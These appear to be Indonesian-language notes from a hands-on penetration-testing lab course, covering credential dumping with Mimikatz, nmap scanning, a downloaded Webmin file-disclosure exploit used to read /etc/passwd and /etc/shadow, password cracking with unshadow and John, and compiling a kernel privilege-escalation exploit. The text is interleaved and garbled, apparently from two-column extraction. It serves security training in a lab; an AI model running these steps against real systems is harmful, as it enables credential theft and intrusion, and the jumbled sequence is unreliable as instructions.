hari ke 2 remote desktop dari windows ke 172.16.10.121 dengan user dan password yang
telah di buat
tomcat
case port 8080 yang akan diserang download Mimikatz dari githup yang .zip
kita dapatkan ip yang akan di serang 172.16.10.119, 172.16.10.120, 172.16.10.121 copy file nya ke os target yang sedang di remote, dan jalankan file exe nya sesuai
lakukan scaning dengan menggunakan command di linux dengan bit nya dengan run as administator
4
ketik command -- privilage::debug
log ----------------------------root
sekurlsa::logonPassword dari ip 172.16.10.154, ditemukan ada 3 port yaitu 22 (ssh), 10000 (ada user dan
---------------------------------------------------------------------------------------------------------- passwword)
LAB 3 file disclosure (cari code exploit) pada port 10000 ditemukan menggunakan webmin, kemudian kita cari bagaimana
webmin exploid di google
172.16.10.154 masuk ke terminal untuk melakukan eksekusi
scan lagi - masuk ke direktori desktop -- cd /root/Desktop
nmap –sV IpAddress - download file webmin exploit -- wget web download
- elihat port apa yg aktif dan versi berapa - ubah file download menjadi .pl -- mv file file.pl
nmap –A IpAddress - ubah mode script agar daoat di gunakan -- chmod 755 file.pl
- Melihat seluruh layanan yg up - jalankan file -- perl file.py
Melihat versi OS secara detail - kemudian cari user dan password yang berjalan pada ip target -- perl file.py iptarget
- Melihat versi 10000 /etc/passwd 0
nmap –sU IpAddress /shadow 0
- Melihat UDP yg aktif - buat file di desktop dengan cara copy user dan password dengan menggunakan
vi /nano
buka port 10000 ada framwork webmin - kombinasikan dengan unshadow -- unshadow filepass fileshaw > filegabungan
- carck nama file dengan aplikasi john
command : - setelah itu login -- ssh alice@ip target
#cd /root/desktop - buka command -- sudo su
#mv nama awal nama akhir, bisa juga memindahkan file - cek fersi kernel nya --uname -a
#wget https -- download - cek versi distro linux -- cat /etc/issue
# chmod 755 nama file - naikkan alice menjadi root dengan cara : -- comand bash dahulu
#nano nama file -- membuat suatu file dengan ekstensi tertentu - google versi kernelnya : kernel 2.6.32-21 exploit
#unshadow - setelah itu masuk ke command lagi untuk mengecek di direktori mana bisa
#pwd -- liat direktori yang diakses membuat file -- ls -al
#rm nama file --> remove file - diketahui ada file yang bisa di tulis (kalau oenuh ada -) di temp -- cd /tmp
- download file tersebut dari website nya dengan lihat view rar dengan copy paste --
passwd -- informasi user /etc/psswd nano namafile (paste) ctr X, Y enter
-- yang bisa untuk login harus ada /home/xxx & /bin/sh atau /bin/bash wajib - rubah file name tersebut menjadi .c -- mv nama file namafile.c -- mv FR-exploit2
-- dapat diaskses oleh user terendah sekalipun FR-exploit2.c
- file code jadi file bin -- gcc FR-exploit2.c -o FR_done2
shadow -- lokasi di etc /etc/shadow - eksekusi -- ./FR_done2
-- encrypt password HARI KE 3
-- hanya dapat diakses oleh root accessnet lAB 4
10